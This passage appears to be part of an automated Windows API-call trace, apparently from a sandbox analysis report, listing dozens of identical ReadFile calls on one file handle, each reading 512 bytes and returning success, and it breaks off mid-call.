1 [0146.655] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.655] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.655] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.655] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.656] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.656] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.656] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.656] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.656] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.656] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.656] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.656] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.656] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.656] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.657] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.657] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.657] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.657] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.657] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.657] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.657] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.657] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.657] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.657] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.657] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.658] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.658] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.658] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.658] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.658] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.658] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.658] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.658] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.658] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.658] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.659] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.659] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.659] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.659] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.659] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.659] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.659] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.659] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.659] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.660] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.660] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.660] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.660] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.660] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.660] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.660] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.660] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.660] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.660] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.660] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.661] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.661] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.661] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.661] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.661] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.661] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.661] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.661] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.661] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.661] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.662] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.662] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.662] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.662] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.662] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.662] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.662] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.662] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.662] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.662] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.662] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.663] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.663] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.663] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.663] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.663] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.663] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.663] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.663] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.663] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.664] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.664] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.664] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.664] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.664] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.664] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.664] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.664] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.664] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.664] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.669] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.669] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.669] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.669] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.669] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.669] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.669] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.669] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.670] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, 